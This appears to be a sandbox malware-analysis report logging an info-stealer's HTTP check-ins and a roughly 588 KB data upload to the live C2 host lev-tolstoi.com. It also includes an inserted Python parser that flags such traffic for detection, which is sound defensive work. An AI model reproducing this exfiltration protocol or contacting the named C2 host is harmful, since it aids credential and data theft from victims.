2024-12-20 06:04:24 UTC | 15331 | OUT | Data Raw (truncated in the report): 2d 2d 49 43 51 39 4a 34 53 55 4d 4b 30 57 37 56 45 42 47 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 49 43 51 39 4a 34 53 55 4d 4b 30 57 37 56 45 42 47 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 43 51 39 4a 34 53 55 4d 4b 30 57 37 56 45 42 47 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62
    Data Ascii (CRLF line breaks restored):
        --ICQ9J4SUMK0W7VEBGUY
        Content-Disposition: form-data; name="hwid"

        DE39FCFBD83CCE4A00D57F9DDD37BE0C
        --ICQ9J4SUMK0W7VEBGUY
        Content-Disposition: form-data; name="pid"

        3
        --ICQ9J4SUMK0W7VEBGUY
        Content-Disposition: form-data; name="lid"

        LPnhqo--nb
2024-12-20 06:04:24 UTC | 4645 | OUT | Data Raw (truncated in the report): 66 a5 31 16 55 bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09
    Data Ascii (binary payload; only printable bytes are shown): f1U2+?2+?2+?o?Mp5
2024-12-20 06:04:25 UTC | 1125 | IN | HTTP/1.1 200 OK
    Date: Fri, 20 Dec 2024 06:04:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=vud0evm3o4tirshmk09nas09m0; expires=Mon, 14 Apr 2025 23:51:04 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W3q9aNEuLvTl13XpqTwTjlcsO2BV%2F9jRacfGMhRTbKU7aX3f2iAG1Uo5lediT5aC%2BFUMz8AQaqkLbwJh3LYZskN7bOmC92F7uaF7MXytemxbtd9cr1maZMB8cBJ3ZSMGgLo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f4d6f4f49546a55-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2341&min_rtt=2333&rtt_var=892&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=20938&delivery_rate=1215147&cwnd=235&unsent_bytes=0&cid=8c13936f6ced037e&ts=981&x=0"
2024-12-20 06:04:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (chunk-size line "f" = 15 bytes, then the chunk data):
        f
        ok 8.46.123.189
2024-12-20 06:04:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii (terminal zero-length chunk):
        0
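
The /api sessions above all have one shape: a POST to /api with a multipart/form-data body carrying hwid, pid and lid (plus, for pid 3, a binary blob), answered by a chunked "ok <ip>" body. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that parses such an exchange and flags it. The request and response bytes are constructed from the session 6 values (boundary, hwid, pid, lid, reply); the closing boundary, the recomputed Content-Length and the field-shape heuristics (32 upper-case hex digits for hwid, a decimal pid, two alphanumeric tokens joined by "--" for lid) are this example's own assumptions, and lid is used as the report shows it, truncated.

```python
"""Parse and flag a LummaC-style POST /api check-in like those in this log.

Added example; not part of the Joe Sandbox report or of the sample. The
sample traffic at the bottom is CONSTRUCTED from the values visible in
session 6. The closing boundary and the Content-Length are supplied here
because the report truncates the captured body.
"""
import re
from typing import Dict, Optional

CRLF = b"\r\n"
HWID_RE = re.compile(r"^[0-9A-F]{32}$")               # assumption: hwid is 32 upper-case hex digits
LID_RE = re.compile(r"^[A-Za-z0-9]+--[A-Za-z0-9]+$")  # assumption: lid is two alnum tokens joined by "--"


def split_http_message(raw: bytes):
    """Return (start line, lower-cased header dict, body) of one HTTP/1.1 message."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].decode("latin-1"), headers, body


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Split a multipart/form-data body into {field name: raw value}.

    Values are sliced rather than stripped so binary parts (like the second
    OUT chunk of session 7) keep any CR/LF bytes they legitimately contain.
    """
    fields: Dict[str, bytes] = {}
    for part in body.split(b"--" + boundary.encode("latin-1"))[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        if part.startswith(CRLF):
            part = part[2:]
        part_headers, _, value = part.partition(CRLF + CRLF)
        if value.endswith(CRLF):
            value = value[:-2]
        name = re.search(rb'name="([^"]*)"', part_headers)
        if name:
            fields[name.group(1).decode("latin-1")] = value
    return fields


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body (size lines are hex)."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(CRLF, pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2                               # skip the CRLF after the data


def classify_checkin(raw_request: bytes) -> Optional[dict]:
    """Return the check-in fields if the request has the shape seen in this log, else None."""
    start, headers, body = split_http_message(raw_request)
    parts = start.split(" ")
    if len(parts) < 2 or parts[0] != "POST" or parts[1] != "/api":
        return None
    content_type = headers.get("content-type", "")
    boundary = re.search(r'boundary="?([^";]+)', content_type)
    if not content_type.startswith("multipart/form-data") or not boundary:
        return None
    fields = parse_multipart(body, boundary.group(1))
    if not {"hwid", "pid", "lid"} <= set(fields):
        return None
    hwid = fields["hwid"].decode("latin-1")
    pid = fields["pid"].decode("latin-1")
    lid = fields["lid"].decode("latin-1")
    if not (HWID_RE.match(hwid) and pid.isdigit() and LID_RE.match(lid)):
        return None
    return {"host": headers.get("host"), "hwid": hwid, "pid": int(pid), "lid": lid,
            "boundary": boundary.group(1),
            "extra_fields": sorted(set(fields) - {"hwid", "pid", "lid"})}


def response_body(raw_response: bytes) -> str:
    """Return the decoded body of the C2 reply, de-chunked when needed."""
    _, headers, body = split_http_message(raw_response)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = decode_chunked(body)
    return body.decode("latin-1")


# Constructed sample traffic: values from session 6; closing boundary and length added here.
BOUNDARY = "UB6YY78GPNR7GMOC0"
_BODY = "".join(
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
    for n, v in [("hwid", "DE39FCFBD83CCE4A00D57F9DDD37BE0C"), ("pid", "2"), ("lid", "LPnhqo--nbgnxdlx")]
).encode() + f"--{BOUNDARY}--\r\n".encode()
SAMPLE_REQUEST = (
    "POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    f"Content-Length: {len(_BODY)}\r\nHost: lev-tolstoi.com\r\n\r\n"
).encode() + _BODY
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n"
    b"Transfer-Encoding: chunked\r\nConnection: close\r\n\r\n"
    b"f\r\nok 8.46.123.189\r\n0\r\n\r\n"
)

if __name__ == "__main__":
    print(classify_checkin(SAMPLE_REQUEST))
    print(response_body(SAMPLE_RESPONSE))
```

The hwid and lid patterns come from three sessions of a single sample, so treat them as a triage heuristic rather than a signature; a production detection should key on the multipart shape (POST /api, fields hwid/pid/lid, a browser User-Agent on a process that is not a browser) together with the resolved C2 host, and should handle the binary pid 3 upload without assuming its fields decode as text.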


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49765 | 104.21.66.86 | 443 | 2144 | C:\Users\user\Desktop\8ZVMneG.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:04:27 UTC | 273 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=1NBWOHGWMH0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1184
    Host: lev-tolstoi.com
2024-12-20 06:04:27 UTC | 1184 | OUT | Data Raw (truncated in the report): 2d 2d 31 4e 42 57 4f 48 47 57 4d 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 31 4e 42 57 4f 48 47 57 4d 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 4e 42 57 4f 48 47 57 4d 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 0d 0a 2d 2d 31 4e 42 57 4f 48 47 57 4d 48
    Data Ascii (CRLF line breaks restored):
        --1NBWOHGWMH0
        Content-Disposition: form-data; name="hwid"

        DE39FCFBD83CCE4A00D57F9DDD37BE0C
        --1NBWOHGWMH0
        Content-Disposition: form-data; name="pid"

        1
        --1NBWOHGWMH0
        Content-Disposition: form-data; name="lid"

        LPnhqo--nbgnxdlxdnyo
        --1NBWOHGWMH
2024-12-20 06:04:27 UTC | 1128 | IN | HTTP/1.1 200 OK
    Date: Fri, 20 Dec 2024 06:04:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=kfr0042hj5ngk03qg3svvooihc; expires=Mon, 14 Apr 2025 23:51:06 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBWYzB%2B7Lwli9W47yxWPoNOh04rRNcfLGRXYtNheV7E8A%2FLSzYbQaUzcoBtAbpScmUV%2Bwn0anzT0jFvqqPAPvGi2aTaarawX0ogrxLQS14i0kkzd%2FRs9AItKUtlKMm%2B7U8Y%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f4d6f5f3ae342ea-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1572&rtt_var=599&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2093&delivery_rate=1811414&cwnd=143&unsent_bytes=0&cid=aa510be4f3d66b47&ts=774&x=0"
2024-12-20 06:04:27 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (chunk-size line "f" = 15 bytes, then the chunk data):
        f
        ok 8.46.123.189
2024-12-20 06:04:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                9192.168.2.649771104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=6DZ4WE0ATJK8ZM
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 587856
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 2d 2d 36 44 5a 34 57 45 30 41 54 4a 4b 38 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 36 44 5a 34 57 45 30 41 54 4a 4b 38 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 44 5a 34 57 45 30 41 54 4a 4b 38 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 0d 0a 2d 2d 36
                                                                                                                                                                                                                                                                Data Ascii: --6DZ4WE0ATJK8ZMContent-Disposition: form-data; name="hwid"DE39FCFBD83CCE4A00D57F9DDD37BE0C--6DZ4WE0ATJK8ZMContent-Disposition: form-data; name="pid"1--6DZ4WE0ATJK8ZMContent-Disposition: form-data; name="lid"LPnhqo--nbgnxdlxdnyo--6
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 9a 92 74 2a 3b 98 06 54 14 79 04 c5 e4 a6 97 97 a4 5b 91 54 cf 5a 44 b0 77 a7 17 1b 1f 3e 54 44 b9 bf 77 f7 ed 8b a4 cb b5 27 68 c9 30 7f b1 40 97 d2 bf de 2f ce 52 4c 03 d5 7f 7b 28 34 0c 39 1f 5b ec 1c 71 7d 1a ed 9b e8 4e 0f 5f d7 2e e9 60 2d c6 03 dd 8c d1 dc 65 0e 01 07 ad 10 50 ae 82 94 28 13 7d f7 a1 47 1e 7a 2d a5 dd b5 66 f8 4c 14 d9 be 2b 67 c9 01 45 9e 47 75 c7 2b d3 1c 45 fb 92 b4 78 5c 0b 4d 46 2c 8a e3 59 5f a7 c7 c5 3d 72 94 b4 62 03 60 5f 1f 54 e3 86 59 36 5e 75 20 3f 35 55 8d b3 72 61 38 1c 73 97 7b 57 cf e9 34 3f 14 77 ff bc b9 3b ea 56 52 ab 24 ba 97 a0 32 14 89 54 65 ae c1 aa 9b 05 20 f9 7f 5f 78 c0 f8 66 26 a6 ce b7 93 b7 8b 91 65 18 04 65 57 72 86 06 ee 32 9a 2a 32 0f 62 e0 c5 da d2 9e 5a ea 82 b7 f7 d6 07 29 3f 58 40 e9 f9 35 39 c7
                                                                                                                                                                                                                                                                Data Ascii: t*;Ty[TZDw>TDw'h0@/RL{(49[q}N_.`-eP(}Gz-fL+gEGu+Ex\MF,Y_=rb`_TY6^u ?5Ura8s{W4?w;VR$2Te _xf&eeWr2*2bZ)?X@59
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 2f 6a 52 0a b0 5a c7 43 c6 6e 9c 9a 86 50 e0 28 23 bf 08 03 e7 48 37 9b e8 25 b1 bf 8d b5 a6 29 37 64 29 2d 93 78 5f 48 21 39 55 f5 7a 10 9f b7 fe 03 63 fd 79 14 a2 95 7d ae 67 c8 1a db 73 0b f5 cf b4 94 8d e4 c7 69 98 68 55 60 be 8e 37 cb 09 c0 d8 e1 73 bc b0 bd 55 54 c9 5f 48 7f 3d 63 28 eb fe 52 f6 f5 32 52 42 97 e5 86 22 b8 ff 6c 1e 29 dd 00 b3 00 f2 3d d5 2a 07 21 09 d0 3c ee fd 92 93 ee 87 4e e3 e3 1a c4 c1 bc e2 6a 7c 8f 08 e1 ab a0 b8 5d 3c cf d4 ea 24 29 1d 90 b1 b1 88 3e af 21 8d 2c 60 fb fa 7d c2 e2 de 53 dd ac f6 61 74 d7 1d 71 6f ee 6d fa b6 2b 44 48 16 01 0f 03 c3 8f d9 60 1a dd 28 b0 51 3c bf 51 6d 61 87 61 a3 be 12 66 4c e7 84 56 bc be c2 ed e5 d1 c9 64 dd 91 c0 07 83 81 e7 ef fe b9 b4 6b cb 3d a3 95 cd d7 02 a7 02 eb b7 27 95 87 95 23 96
                                                                                                                                                                                                                                                                Data Ascii: /jRZCnP(#H7%)7d)-x_H!9Uzcy}gsihU`7sUT_H=c(R2RB"l)=*!<Nj|]<$)>!,`}Satqom+DH`(Q<QmaafLVdk='#
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 13 d7 db 5d bd 57 5c ad d3 1e 65 e6 ad 7a 4d 0d 0c 9f 2f 7d 06 57 d1 cd 03 b3 c6 c9 1c 63 6f 81 e4 11 db ea 85 53 31 ec fd 3b a1 61 7b b8 aa b0 10 17 05 c5 8c 47 ba c0 a5 1d 0e d8 c9 17 bc be 47 33 bf 90 1a 7f 6b 03 22 8c ed 2e 09 de 60 26 07 03 0e 24 9c d0 fd 23 f4 cf e8 9a ef 04 88 e3 38 bd f2 05 a2 00 ae fb fe 84 22 0c 8c 7c 36 05 c4 5e 1f d3 d3 41 5f 60 e4 d8 33 13 01 6b 4b 59 c1 a5 fb 47 ff 09 29 06 f6 e7 a7 8b 07 b3 8e 64 29 74 6b 80 e3 0f 9b 57 02 ca 56 e5 b3 ca 8e 10 07 6a 67 96 26 be e8 03 2c a5 9e fb 82 a7 d9 b5 c6 7c 8c d5 b8 d4 f8 bb ac 3d a5 e1 45 be e5 75 08 94 d2 4a e4 4f 73 32 d1 d4 b1 d1 d0 f7 2a 09 a7 9b 9b 48 8c ae e0 8f 30 62 6d 80 53 e2 8a 43 9b 22 3b 16 46 1d 41 86 87 42 13 04 0b a1 5a 77 33 6a b8 30 58 3b 44 a9 f8 7c 50 1b be 73 05
                                                                                                                                                                                                                                                                Data Ascii: ]W\ezM/}WcoS1;a{GG3k".`&$#8"|6^A_`3kKYG)d)tkWVjg&,|=EuJOs2*H0bmSC";FABZw3j0X;D|Ps
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: c7 c3 15 5d 9a ef c7 2f 51 db 71 86 17 c0 f7 a5 2c 42 47 dd 71 fa a5 d6 f0 40 3b 34 e6 ed 97 7e db 61 92 bf 71 46 1b 6f aa 2c e8 53 3a 9a 7a 0a 68 94 66 29 80 82 cc 17 a1 91 a8 97 69 39 2c a6 57 55 36 ee ed 1b 08 2b c3 0e 2e f1 54 4e 44 ba cd b7 35 f3 f7 6e dc 08 9e 70 dd 25 d9 77 cc a0 c0 ec 00 ee b5 02 01 f7 0e db 61 a2 8b 00 b0 96 6d 5e 60 f6 47 21 12 4e 4e a3 d6 7a 02 da 05 44 c4 8d 0c af be 15 9a 15 20 da 26 15 58 83 02 7b 57 a2 52 c6 55 32 d5 10 d7 a7 02 72 8f c8 14 ec 02 76 27 d2 08 a6 70 aa 09 99 90 dd 8b f1 aa f9 41 58 ed 8e 53 24 8a 0b f2 f1 5d 42 91 87 23 a8 4e 53 5c 93 9f 64 69 f1 5a e2 be d0 32 03 8c ae ff ad 37 47 b0 76 dc 3a 7e 93 cb 20 25 cb e4 27 78 8b 41 f0 02 3f 1e e2 b3 20 32 1f 1b 20 d4 b0 eb 67 89 67 27 de b8 1e e1 5b 58 61 c5 29 79
                                                                                                                                                                                                                                                                Data Ascii: ]/Qq,BGq@;4~aqFo,S:zhf)i9,WU6+.TND5np%wam^`G!NNzD &X{WRU2rv'pAXS$]B#NS\diZ27Gv:~ %'xA? 2 gg'[Xa)y
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 68 28 82 af 7c 9e 49 6c 8c 96 89 e7 09 d3 e9 94 9a 93 fb 7d 27 7b 15 8b 5f 15 09 4e f9 a0 b9 c6 b8 be 95 04 f0 f6 c6 fb ee d3 ca dd 2d a7 82 53 00 48 90 95 19 bb 38 9b 56 8c ef 0b ca 76 b5 1a e3 39 a4 d5 e4 17 c0 52 e2 93 79 b8 af 40 8b 73 53 27 19 65 e0 05 4a b7 1b 5d 67 cf 9d 61 36 ac 1d b4 f3 bc 6b 8c df 1c 7f 5f f4 a1 ba 13 72 47 34 0f 7a 78 2b ba 3d f1 3e 99 4e c2 cf e7 af 0e 57 54 ba b6 9a 1c 0b a7 8e fb ad 6c fe 7d fc 60 5c 85 6c 06 07 dc 67 30 d3 eb d3 d7 33 2b ec 34 c0 d2 23 5e 90 3f d8 ad ad be 56 cb df a5 3b bf d6 fc 4a d0 3c 74 b0 67 b2 99 1a b0 f9 9b 8d a6 e7 0f 6a 62 21 46 e2 45 66 90 f9 f6 de c2 7b f9 43 1b 15 e3 d1 da 54 e1 aa 35 66 72 2a 2f 01 cc 57 99 ab c5 0f 0e f9 3f c0 c1 cd 58 e6 2e c0 10 7f e9 28 09 98 25 1d d8 e0 0b 7c 80 26 89 a6
                                                                                                                                                                                                                                                                Data Ascii: h(|Il}'{_N-SH8Vv9Ry@sS'eJ]ga6k_rG4zx+=>NWTl}`\lg03+4#^?V;J<tgjb!FEf{CT5fr*/W?X.(%|&
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: be f2 95 2c d7 47 ab 3f 62 68 e0 1d b2 57 7e fa 47 df e4 61 14 ec c2 34 7f 5c 02 e6 2c b7 1b 84 3a 9d 95 25 22 de 74 c1 76 f3 9e 76 00 46 8d ab 27 04 40 6a f4 fc 5d 0d 69 20 a6 0b 4c 41 6b 39 f0 10 37 1a 7e 44 af de db 77 91 2e 06 02 51 9c fe 30 3a 0a 48 dc c1 8d fd e0 59 f6 83 b0 ec 5f 10 43 84 fd 2c 3e 7f ff 42 d2 f8 f6 11 32 88 5e 99 9d 8f 85 cb e5 6e a0 ec 80 bb 6c 98 18 b0 cb ce 2a 68 6d c6 5f 8a 8c 2f c7 7a 9d 7c da e6 a8 3f 67 39 52 1d 73 73 92 a7 43 12 96 12 da 23 f2 a7 37 85 a9 41 d8 2c d9 6e d3 99 21 27 8a 8a 84 c3 3d d1 e7 01 1e 62 9f 96 c2 72 11 0c 00 6d e8 30 2a f7 20 45 f4 55 b5 9f 65 c4 ae 11 ae 8e 27 ce b1 e1 98 68 1e 81 bb 7f be 1b fd d1 6d c6 fe e1 23 f7 4d 7b a4 22 11 f3 2c 17 cf 9d 9c 96 27 11 88 c6 c6 c2 3c 58 d3 36 ca 39 7e fe f2 85
                                                                                                                                                                                                                                                                Data Ascii: ,G?bhW~Ga4\,:%"tvvF'@j]i LAk97~Dw.Q0:HY_C,>B2^nl*hm_/z|?g9RssC#7A,n!'=brm0* EUe'hm#M{",'<X69~
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: d4 7d a2 39 cf 94 97 4e ef 12 26 33 1c 22 83 51 9b 60 e3 da 52 e7 c6 ab f7 dc 5b 2b e3 60 5a 14 d8 5d d8 de a9 8c f8 83 ff a1 e1 b3 f9 80 e0 93 cf 07 de ef 41 23 ee 09 48 99 04 05 b2 f8 69 6e 90 76 21 86 fa 0a 82 2b e5 d4 40 77 c2 19 50 90 da ab 09 05 1d 52 2c 10 05 7f e4 fa e4 4e fa b8 0f 3b ef 07 8d 9b db fd d3 7a f1 29 67 78 e6 df d9 cd 2c c0 56 17 e9 ef f1 5c d8 e9 ab cb 36 99 ce 3c a8 de 6c f5 9a 74 51 d9 28 10 4e 88 94 4d 8d bc c7 b5 a3 e3 e8 27 e7 7d 93 12 7c 79 86 bc 2b fe 6f 89 88 c7 4f 3f 5b fc 54 80 fc 24 b2 95 ff 18 f1 18 38 86 a8 44 a7 bf 19 a1 bc 3f 68 07 77 ca 30 64 67 77 a0 ae 9d 8e 47 91 78 34 50 17 44 6a c7 ac fd d0 e7 66 00 d1 45 1e a1 9c 6b 3a 6a 84 ae 18 b8 94 fc fa c9 53 56 d6 6e 85 49 3e cc 16 7a de ba 31 4b 3d 89 9c 34 26 c6 d5 99
                                                                                                                                                                                                                                                                Data Ascii: }9N&3"Q`R[+`Z]A#Hinv!+@wPR,N;z)gx,V\6<ltQ(NM'}|y+oO?[T$8D?hw0dgwGx4PDjfEk:jSVnI>z1K=4&
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 5f 6e 60 ab fd 34 4c 6a 1f 5c 0a 37 2c 14 f0 b8 b7 10 0b 98 d8 a1 6f 2f ca 94 35 12 af af 16 50 12 60 aa b5 d1 89 30 9d 3e b4 a2 c6 00 b4 8c 3b 34 01 d0 ec 24 37 b6 2e 7f f7 5e 77 68 d2 f2 78 5c 7e 8e 5d ca 95 cf c5 cb 82 21 ad 93 a3 e1 27 17 1e bf db 8d 28 6b a9 bf 34 fa f9 56 ab e0 4b d4 e5 82 9b 0b ab 8b 64 22 72 e1 7f 8f 5a 96 21 17 9d fb b6 18 cd 72 47 c6 be 13 3e 5f fe 9c cd d3 7a 33 9a 93 f0 9d bd 31 9a 48 5b 51 64 ec 60 29 78 10 87 c7 26 67 29 c1 1f 54 18 ec 5f dc 38 74 5a 14 9c aa 26 66 9e b9 67 c2 f3 94 63 fd d0 94 17 9c 4c 3d 98 97 c3 b7 d0 b6 e8 e6 48 7d b3 55 12 3d bf fa 8a c0 9b 2c 7e e3 db 75 98 19 ad ee b1 e7 d5 c8 fb 2a 5b 44 f6 61 3b 0d ee 2f eb 30 aa 2a f8 a0 d3 a5 87 44 e2 62 d5 aa b9 26 ec 98 36 95 a3 df 5f be f5 b9 75 e1 40 50 c6 ab
                                                                                                                                                                                                                                                                Data Ascii: _n`4Lj\7,o/5P`0>;4$7.^whx\~]!'(k4VKd"rZ!rG>_z31H[Qd`)x&g)T_8tZ&fgcL=H}U=,~u*[Da;/0*Db&6_u@P
